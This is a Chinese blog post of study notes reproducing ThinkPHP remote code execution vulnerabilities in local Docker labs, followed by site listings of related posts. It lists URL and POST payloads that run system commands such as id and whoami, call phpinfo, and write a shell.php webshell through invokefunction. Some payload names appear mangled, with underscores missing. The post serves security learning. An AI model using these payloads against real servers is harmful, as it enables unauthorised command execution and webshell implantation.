Thinkphp漏洞学习笔记

于 2024-09-11 11:52:43 发布
阅读量257 收藏 1
点赞数 13
文章标签: 学习 笔记 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66022252/article/details/142135276
版权

2-rce

进入到2-rce文件后,docker-compose up -d启动容器

在浏览器中登陆靶场ip:8080

输入payload://index.php?s=/index/index/xxx/${system(id)}

//index.php?s=/index/index/xxx/${system(whoami)}

//index.php?s=/index/index/xxx/${phpinfo()}

5.0.23-rce

进入到5.0.23-rce文件后,docker-compose up -d启动容器

在浏览器中登陆靶场ip:8080

payload:/index.php?s=captcha

在HackBar中选择post data,在下面的输入框中执行poc:method=construct&filter[]=system&method=get&server[REQUESTMETHOD]=id

5-rce

进入到5-rce文件后,docker-compose up -d启动容器

在浏览器中登陆靶场ip:8080

查看php配置,输入payload:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

将php文件写入信息,payload:/index.php?s=/index/\think\app/invokefunction&function=calluserfuncarray&vars[0]=fileput_contents&vars[1][]=shell.php&vars[1][]=

查看shell php信息内容,payload:shell.php

开荤小肥羊
关注
  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
ThinkPHP3.2.3过渡到ThinkPHP5.0学习笔记图文详解
10-17
主要介绍了从ThinkPHP3.2.3过渡到ThinkPHP5.0学习笔记,结合图文形式详细分析了thinkPHP3.2.3框架开发过渡到thinkPHP5.0框架的区别与改进方法,需要的朋友可以参考下
thinkPHP漏洞检测
07-18
thinkPHP漏洞检测
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
ThinkPHP学习笔记(一)ThinkPHP部署
12-19
ThinkPHP学习笔记(一):ThinkPHP部署】 在学习ThinkPHP框架时,首先需要搭建一个本地开发环境,这里提到的是使用WAMP Server。WAMP是Windows、Apache、MySQL和PHP的组合,提供了在Windows环境下运行PHP应用的...
ThinkPHP php 框架学习笔记
10-29
花了两个多钟在看 ThinkPHP 框架,不想太过深入的知道它的所有高深理论。单纯想知道怎么可以用起来,可以快捷的搭建一个网站。所以是有选择的看,二个钟后还是一头雾水。于是决定改变学习策略,上官方论坛看其它高人...
thinkphp 一键漏洞检测
12-09
此外,源代码的可用性还意味着用户可以深入了解检测过程,学习如何识别和处理ThinkPHP框架中的安全问题。 在使用这个工具时,开发者或管理员需要先安装必要的环境,比如PHP运行环境和Git(如果要从源码构建)。然后...
thinkPHP学习笔记之安装配置篇
12-19
虽然在初期接触时可能会遇到一些理解上的困扰,如URL访问规则等,但通过学习和实践,开发者能快速上手并进行高效的Web应用开发。了解并掌握thinkPHP的基础知识和工作原理,对于提升PHP开发效率和项目管理有显著帮助...
thinkphp3.1.2学习笔记
09-22
在深入探讨ThinkPHP3.1.2学习笔记之前,让我们先了解一下ThinkPHP框架。ThinkPHP是一个基于MVC(Model-View-Controller)模式的简洁、轻量级的PHP开发框架,它强调代码运行效率和开发速度,适用于中小型企业的Web...
thinkphp学习笔记入门到深入篇
11-10
ThinkPHP学习笔记入门到深入篇】 ThinkPHP是一款基于PHP的开源快速开发框架,它以其简洁的代码结构、高效的性能和强大的功能深受开发者喜爱。这篇笔记涵盖了从基础到深入的多个方面,旨在帮助初学者迅速掌握...
thinkphp6文件写入漏洞
01-08
标题中的“ThinkPHP6文件写入漏洞”是一个关于网络安全的具体问题,主要涉及到的是ThinkPHP6框架在处理文件操作时可能出现的安全隐患。ThinkPHP是广泛应用于中国的一个开源PHP框架,其最新版本6.0在设计和实现过程中...
thinkphp漏洞一键检测工具最新版
03-23
thinkphp漏洞检测工具,漏洞POC基本适用ThinkPHP全版本漏洞
thinkphp学习笔记之多表查询
01-20
在操作过程中,两表查询都没有问题,但是三表查询就开始出现问题 有以下三张表,分表为pl表(uid,content),user表(id,username),lyb表(uid,title) 多表查询操作有以下几种方法: ㈠视图模型(推荐) ...
thinkphp-queue 笔记.md
05-09
thinkphp-queue 笔记.md
ThinkPhp课堂笔记
04-25
### ThinkPHP框架基础知识与应用详解 #### 一、ThinkPHP框架概述 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级...无论是对于初学者还是有经验的开发者来说,ThinkPHP都是一个值得学习和使用的PHP框架。
qmt量化交易策略小白学习笔记第61期【qmt编程之期权行情数据--get_market_data_ex函数】
fanglue3705的博客
09-09 538
获取期权行情数据 获取期权最新数据,首先需要进行数据订阅。完成合约订阅后,用get_market_data_ex函数即可提取相关信息。这个过程包含两大步骤: 第一,通过订阅操作确保能接收到你感兴趣的期权合约的更新; 第二,调用get_market_data_ex函数来实际获取并处理这些订阅到的数据,如果需要用到历史数据或过期合约数据,需要使用download_history_data进行下载。
sheng的学习笔记-AI-规则学习(rule learning)
coldstarry的专栏
09-09 812
机器学习中的“规则”(rule)通常是指语义明确、能描述数据分布所隐含的客观规律或领域概念、可写成“若……,则……”形式的逻辑规则。​“规则学习”(rule learning)是从训练数据中学习出一组能用于对未见示例进行判别的规则。一条规则形如:在数理逻辑中“文字”专指原子公式(atom)及其否定。与神经网络、支持向量机这样的“黑箱模型”相比,规则学习具有更好的可解释性,能使用户更直观地对判别过程有所了解。另一方面,数理逻辑具有极强的表达能力,绝大多数人类知识都能通过数理逻辑进行简洁的刻画和表达。
区块链学习笔记2--区块链技术的形成 以太坊
最新发布
weixin_61074128的博客
09-10 207
以太坊的定义:以太坊是运行在一个计算机网络中的软件,他确保数据以及智能合约的小程序可以在没有宗信协调者的情况下,被所有网络中的计算机复制和处理。以太坊的改进: 交易速度加快;pow+pos算法,逐步向pos算法过渡;智能合约:不受人为因素影响,没有黑幕;比特币的出现让经济贸易变得简单,而比特币系统的不足,也同样被人诟病。于是出现了致力解决比特币不足的“V神”。以太坊的愿景是创建一个无法停止,抗屏蔽(审查)和自我维持的去中心化世界计算机。比特币的不足:交易速度慢;仅仅完成了货币的去中心化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值